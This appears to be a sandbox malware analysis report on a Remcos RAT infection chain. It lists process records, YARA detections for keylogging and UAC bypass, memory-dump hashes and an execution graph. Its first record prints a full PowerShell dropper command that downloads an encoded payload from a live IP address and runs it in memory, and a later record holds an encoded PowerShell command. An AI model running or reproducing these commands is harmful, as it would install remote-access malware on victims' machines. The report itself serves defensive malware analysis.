                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"
                                                                                                      Imagebase:0x7ff741d30000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:10
                                                                                                      Start time:03:36:10
                                                                                                      Start date:20/11/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c
                                                                                                      Imagebase:0x7ff642d20000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:12
                                                                                                      Start time:03:36:11
                                                                                                      Start date:20/11/2024
                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                      Imagebase:0x7ff75c910000
                                                                                                      File size:22'528 bytes
                                                                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:13
                                                                                                      Start time:03:36:14
                                                                                                      Start date:20/11/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text
                                                                                                      Imagebase:0x7ff741d30000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:15
                                                                                                      Start time:03:36:21
                                                                                                      Start date:20/11/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                      Imagebase:0xcb0000
                                                                                                      File size:43'008 bytes
                                                                                                      MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1573715512.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac450000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                        • Instruction ID: 6f88b0329515345a9c61e65f3469a8e9060db859324e1795e10e2e6537b9e572
                                                                                                        • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                        • Instruction Fuzzy Hash: D401677151CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3661D636E882CB45
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1519690531.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 7> $(7> $P*$_
                                                                                                        • API String ID: 0-1822527071
                                                                                                        • Opcode ID: e4564b56d8ce57128add3daeee8afcb367866f3b5f2e6580bbe5dcf8ed5ace01
                                                                                                        • Instruction ID: 2d822be8a156814f6c5b70c9b2950ac1f0f0e245c57570074356fcc7697cdde5
                                                                                                        • Opcode Fuzzy Hash: e4564b56d8ce57128add3daeee8afcb367866f3b5f2e6580bbe5dcf8ed5ace01
                                                                                                        • Instruction Fuzzy Hash: 4BE23362E4EB8E8FE756972888555B57FE4EF57210B0881FFE08EC7193D919AC09C381
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1519690531.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: h8> $p8>
                                                                                                        • API String ID: 0-2814837286
                                                                                                        • Opcode ID: e591236ea8f4c61bf844f51d122d29ba6586fddacb59a10744a6062df1eec454
                                                                                                        • Instruction ID: a0dff961e93d5d4a5ad9ff263d7f2e3634a15d788fec5aab12f7df3f64844c20
                                                                                                        • Opcode Fuzzy Hash: e591236ea8f4c61bf844f51d122d29ba6586fddacb59a10744a6062df1eec454
                                                                                                        • Instruction Fuzzy Hash: 4F510970D0961D8FEBA5DB68C8986E9BBB1EF59300F5005EED00DE7291CA35AAC5CF40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1518420921.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 59025604f918c94ec6eee44e329d3362db32a65d53a06273fda3495ab508ae8b
                                                                                                        • Instruction ID: 0841661b3482790261f27d05ad8ba76da9963494b23bed7598172dbc9495309d
                                                                                                        • Opcode Fuzzy Hash: 59025604f918c94ec6eee44e329d3362db32a65d53a06273fda3495ab508ae8b
                                                                                                        • Instruction Fuzzy Hash: 5351493160D6858FE745EB2CD8999F47BE0EF57324B1842BED08DC71A3D929A84AC781
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1519690531.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fe5148fb6c8a179cd0a13491802f1bf43c8ad5f94cbbd740bbfda5185e86b98e
                                                                                                        • Instruction ID: a6a40384bc5b6ae0087195e61281eaa8f08a2d17188127e035a96425941fb0ef
                                                                                                        • Opcode Fuzzy Hash: fe5148fb6c8a179cd0a13491802f1bf43c8ad5f94cbbd740bbfda5185e86b98e
                                                                                                        • Instruction Fuzzy Hash: 3041E252D5EB8B4FF366532848656B26FA5DF57200B0981FAE44EC7193DC1AEC0D83D1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1519690531.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d4cfc08604868d0cc87c8c456e1ced6e588f10810f21c2ae6174a76aa0b46aa6
                                                                                                        • Instruction ID: e79fd030d3eb0b7b478c6d4a71d23bd65f7718ad03d58cb607bc2c5eb6226cf0
                                                                                                        • Opcode Fuzzy Hash: d4cfc08604868d0cc87c8c456e1ced6e588f10810f21c2ae6174a76aa0b46aa6
                                                                                                        • Instruction Fuzzy Hash: 9E51197090962D8FDBA9DF68C8987ACBBB1EF59301F5041EED04DE76A1CA355A85CF00
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1518420921.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e90c9c6947a93ff7170ba4ee336a32f74a53c50c5ad67626307e9006d868e630
                                                                                                        • Instruction ID: 2c9ba306ad8534d4f4d110746481f11d8954a241f66507aaba57c2a0d500d809
                                                                                                        • Opcode Fuzzy Hash: e90c9c6947a93ff7170ba4ee336a32f74a53c50c5ad67626307e9006d868e630
                                                                                                        • Instruction Fuzzy Hash: F9418B70909A4ACFEB59DF98D8595FDBBF1EB69301F00413AD01EE3291CA24A9458B84
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1519690531.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9b9ad11847da680c4e13970d6b44c99480b20cd50a37486dfa39b07991092910
                                                                                                        • Instruction ID: e86bdda487a5ea3ac50b774d3a29deb7b0b8574679578e22b22b05b4267a5a3a
                                                                                                        • Opcode Fuzzy Hash: 9b9ad11847da680c4e13970d6b44c99480b20cd50a37486dfa39b07991092910
                                                                                                        • Instruction Fuzzy Hash: 523123A2E4FB8F8BF7959769086517A6ED99F12250B5841BDE40FC71D2DC0AD84C8381
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1518420921.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 40afd575c30beaaa062f67bf5a6cd57a69a7e41e3b1680fd98d1f3246f664f24
                                                                                                        • Instruction ID: d6673054a7974b5fb8908753b72fa7ae49b88b13dc166f2abf4713c220c5d19e
                                                                                                        • Opcode Fuzzy Hash: 40afd575c30beaaa062f67bf5a6cd57a69a7e41e3b1680fd98d1f3246f664f24
                                                                                                        • Instruction Fuzzy Hash: C431CE7090DA8A8FEB4ADF64C8655F9BBF1FF56301F04816ED01AD7292CA34A945CBC1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1518420921.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                        • Instruction ID: 2724c3d3a17d334ee1092ce002ed42cbe3c4f0618e834c606a8bcd16dd44d845
                                                                                                        • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                        • Instruction Fuzzy Hash: 5201677111CB0C8FD744EF0CE451AB5B7E0FB95364F10056DE58AC36A5DA36E881CB45
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1518420921.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1374836ca91e80a4b3ab409431d90c3a2d658d893e86d830d284faa13db87aed
                                                                                                        • Instruction ID: 4405cb5726b2a004fbe6d098eea36712133f60645efbd7abb174c46b028adc04
                                                                                                        • Opcode Fuzzy Hash: 1374836ca91e80a4b3ab409431d90c3a2d658d893e86d830d284faa13db87aed
                                                                                                        • Instruction Fuzzy Hash: 99F0373275C6048FDB4CAA1CF4429B573D1E795324B10416EE48BC2696D917E8468785
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1519690531.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fa63dfb50f7f391e2e2f0ae46fd18d2138fc06cfe704763022bdd06a1cd59f0d
                                                                                                        • Instruction ID: 94d423db68df97f9a016b1008dff948d8bd0d05a12f7f441f8969d1ce62772e2
                                                                                                        • Opcode Fuzzy Hash: fa63dfb50f7f391e2e2f0ae46fd18d2138fc06cfe704763022bdd06a1cd59f0d
                                                                                                        • Instruction Fuzzy Hash: 40017271A1896C8FDB90EB28C89DB99B7F5FF5A301F4405E5904CD7261DA34AE81CF00
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1518420921.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4d1ba689204d017ec913a79f938ba19731d04a6a7c81aa78f8121614fefbea28
                                                                                                        • Instruction ID: 441e2f305a5e7b66c298faaaba42482fded4d1792aad2f0f469f8d3c4893cc83
                                                                                                        • Opcode Fuzzy Hash: 4d1ba689204d017ec913a79f938ba19731d04a6a7c81aa78f8121614fefbea28
                                                                                                        • Instruction Fuzzy Hash: 09F03C34E0D50ACBEB18DB54C4958BDB7B6EB9A315F10812DC01EA72C1DE34AA46CBD8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1519690531.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:

Execution Graph

Execution Coverage: 4.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 5.7%
Total number of Nodes: 1402
Total number of Limit Nodes: 65
47373->47374 47375 401d64 28 API calls 47374->47375 47377 414098 47375->47377 47376 401fbd 28 API calls 47376->47420 47379 401d64 28 API calls 47377->47379 47378 41afc3 28 API calls 47378->47420 47380 4140a9 47379->47380 47383 401d64 28 API calls 47380->47383 47381 401d64 28 API calls 47381->47420 47382 4085b4 28 API calls 47382->47420 47384 4140ba 47383->47384 47385 401d64 28 API calls 47384->47385 47387 4140cb 47385->47387 47386 401eef 26 API calls 47386->47420 47389 401d64 28 API calls 47387->47389 47388 401eea 26 API calls 47388->47420 47390 4140dd 47389->47390 48055 404101 87 API calls 47390->48055 47393 414244 WSAGetLastError 48056 41bc76 30 API calls 47393->48056 47397 401f66 28 API calls 47443 414259 47397->47443 47401 404cbf 28 API calls 47401->47420 47402 401d64 28 API calls 47402->47443 47403 401d8c 26 API calls 47403->47443 47404 43a5e7 _strftime 42 API calls 47406 414b80 Sleep 47404->47406 47405 405ce6 28 API calls 47405->47420 47406->47443 47407 4027cb 28 API calls 47407->47420 47408 401f66 28 API calls 47408->47420 47409 41a686 79 API calls 47409->47420 47412 4082dc 28 API calls 47412->47420 47413 440c51 26 API calls 47413->47420 47414 41265d 3 API calls 47414->47420 47415 412513 31 API calls 47415->47420 47416 403b40 28 API calls 47416->47420 47420->47376 47420->47378 47420->47381 47420->47382 47420->47386 47420->47388 47420->47393 47420->47401 47420->47405 47420->47407 47420->47408 47420->47409 47420->47412 47420->47413 47420->47414 47420->47415 47420->47416 47421 41ad46 28 API calls 47420->47421 47422 401d64 28 API calls 47420->47422 47420->47443 47922 413f9a 47420->47922 47927 4041f1 47420->47927 47934 404915 47420->47934 47949 40428c connect 47420->47949 48009 41a96d 47420->48009 48012 413683 47420->48012 48015 40cbf1 47420->48015 48021 41adee 47420->48021 48024 41aec8 47420->48024 47421->47420 47423 4144ed GetTickCount 47422->47423 47424 41ad46 28 API calls 47423->47424 47437 414507 47424->47437 47426 41ad46 28 API calls 47426->47437 47429 
41aec8 28 API calls 47429->47437 47431 405ce6 28 API calls 47431->47437 47432 40275c 28 API calls 47432->47437 47433 4027cb 28 API calls 47433->47437 47435 401eea 26 API calls 47435->47437 47436 401e13 26 API calls 47436->47437 47437->47426 47437->47429 47437->47431 47437->47432 47437->47433 47437->47435 47437->47436 48028 41aca0 47437->48028 48030 41ac52 47437->48030 48035 40e679 GetLocaleInfoA 47437->48035 48038 4027ec 28 API calls 47437->48038 48039 4045d5 47437->48039 48058 404468 60 API calls _Yarn 47437->48058 47440 41a686 79 API calls 47440->47443 47441 414b22 CreateThread 47441->47443 48208 419e89 103 API calls 47441->48208 47442 401eea 26 API calls 47442->47443 47443->47397 47443->47402 47443->47403 47443->47404 47443->47420 47443->47440 47443->47441 47443->47442 47444 401e13 26 API calls 47443->47444 48057 404c9e 28 API calls 47443->48057 48059 40a767 84 API calls 47443->48059 48060 4047eb 98 API calls 47443->48060 47444->47443 47445->46798 47446->46808 47449 4085c0 47448->47449 47450 402e78 28 API calls 47449->47450 47451 4085e4 47450->47451 47451->46829 47453 4124e1 RegQueryValueExA RegCloseKey 47452->47453 47454 41250b 47452->47454 47453->47454 47454->46825 47455->46832 47456->46861 47457->46854 47458->46845 47459->46859 47461 40c8ba 47460->47461 47462 40c8da 47461->47462 47463 40c90f 47461->47463 47465 40c8d0 47461->47465 48209 41a74b 29 API calls 47462->48209 47464 41b15b GetCurrentProcess 47463->47464 47468 40c914 47464->47468 47467 40ca03 GetLongPathNameW 47465->47467 47470 403b40 28 API calls 47467->47470 47471 40c918 47468->47471 47472 40c96a 47468->47472 47469 40c8e3 47473 401e18 26 API calls 47469->47473 47474 40ca18 47470->47474 47477 403b40 28 API calls 47471->47477 47476 403b40 28 API calls 47472->47476 47478 40c8ed 47473->47478 47475 403b40 28 API calls 47474->47475 47479 40ca27 47475->47479 47480 40c978 47476->47480 47481 40c926 47477->47481 47483 401e13 26 API calls 47478->47483 48212 40cc37 28 API calls 47479->48212 47486 403b40 28 API 
calls 47480->47486 47487 403b40 28 API calls 47481->47487 47483->47465 47484 40ca3a 48213 402860 28 API calls 47484->48213 47489 40c98e 47486->47489 47490 40c93c 47487->47490 47488 40ca45 48214 402860 28 API calls 47488->48214 48211 402860 28 API calls 47489->48211 48210 402860 28 API calls 47490->48210 47494 40ca4f 47497 401e13 26 API calls 47494->47497 47495 40c999 47498 401e18 26 API calls 47495->47498 47496 40c947 47499 401e18 26 API calls 47496->47499 47500 40ca59 47497->47500 47501 40c9a4 47498->47501 47502 40c952 47499->47502 47503 401e13 26 API calls 47500->47503 47504 401e13 26 API calls 47501->47504 47505 401e13 26 API calls 47502->47505 47506 40ca62 47503->47506 47507 40c9ad 47504->47507 47508 40c95b 47505->47508 47509 401e13 26 API calls 47506->47509 47510 401e13 26 API calls 47507->47510 47511 401e13 26 API calls 47508->47511 47512 40ca6b 47509->47512 47510->47478 47511->47478 47513 401e13 26 API calls 47512->47513 47514 40ca74 47513->47514 47515 401e13 26 API calls 47514->47515 47516 40ca7d 47515->47516 47516->46907 47517->46919 47518->46941 47520 412683 RegQueryValueExA RegCloseKey 47519->47520 47521 4126a7 47519->47521 47520->47521 47521->46900 47522->46933 47523->46969 47524->46979 47525->47003 47526->46991 47527->47024 47529 401e0c 47528->47529 47530->46852 47533 40e183 47532->47533 47534 41a65c LoadResource LockResource SizeofResource 47532->47534 47533->47154 47534->47533 47536 401f86 28 API calls 47535->47536 47537 406066 47536->47537 47537->47165 47548 403c30 47538->47548 47542 41bfae 47541->47542 47543 41bfcb 47542->47543 47545 41bfd2 47542->47545 47583 41bfe3 28 API calls 47543->47583 47564 41c552 47545->47564 47546 41bfd0 47546->47186 47549 403c39 47548->47549 47552 403c59 47549->47552 47553 403c68 47552->47553 47558 4032a4 47553->47558 47555 403c74 47556 402325 28 API calls 47555->47556 47557 403b73 47556->47557 47557->47186 47559 4032b0 47558->47559 47560 4032ad 47558->47560 47563 4032b6 28 API calls 47559->47563 47560->47555 47565 41c55c 
__EH_prolog 47564->47565 47566 41c673 47565->47566 47567 41c595 47565->47567 47590 402649 28 API calls std::_Xinvalid_argument 47566->47590 47584 4026a7 28 API calls 47567->47584 47571 41c5a9 47585 41c536 28 API calls 47571->47585 47573 41c5dc 47574 41c603 47573->47574 47575 41c5f7 47573->47575 47587 41c7cf 26 API calls 47574->47587 47586 41c7b2 26 API calls 47575->47586 47578 41c601 47589 41c75a 26 API calls 47578->47589 47579 41c60f 47588 41c7cf 26 API calls 47579->47588 47582 41c63e 47582->47546 47583->47546 47584->47571 47585->47573 47586->47578 47587->47579 47588->47578 47589->47582 47591->47190 47594 402e85 47593->47594 47595 402ea9 47594->47595 47596 402e98 47594->47596 47598 402eae 47594->47598 47595->47199 47600 403445 28 API calls 47596->47600 47598->47595 47601 40225b 26 API calls 47598->47601 47600->47595 47601->47595 47603 404bd0 47602->47603 47606 40245c 47603->47606 47605 404be4 47605->47202 47607 402469 47606->47607 47608 402478 47607->47608 47610 402ad3 28 API calls 47607->47610 47608->47605 47610->47608 47611->47206 47613 401e94 47612->47613 47615 41a471 47614->47615 47616 41b168 GetCurrentProcess 47614->47616 47617 412513 RegOpenKeyExA 47615->47617 47616->47615 47618 412541 RegQueryValueExA RegCloseKey 47617->47618 47619 412569 47617->47619 47618->47619 47620 401f66 28 API calls 47619->47620 47621 41257e 47620->47621 47621->47219 47622->47227 47624 40b02f 47623->47624 47627 40b04b 47624->47627 47626 40b045 47626->47238 47628 40b055 47627->47628 47630 40b060 47628->47630 47631 40b138 28 API calls 47628->47631 47630->47626 47631->47630 47632->47242 47633->47245 47635 40230d 47634->47635 47636 402325 28 API calls 47635->47636 47637 401f80 47636->47637 47637->46912 47656 43a545 47638->47656 47640 43998b 47665 4392de 38 API calls 3 library calls 47640->47665 47641 439950 47641->47640 47642 439965 47641->47642 47655 40dd54 47641->47655 47663 445354 20 API calls _abort 47642->47663 47645 43996a 47664 43a827 26 API calls _Deallocate 47645->47664 47648 
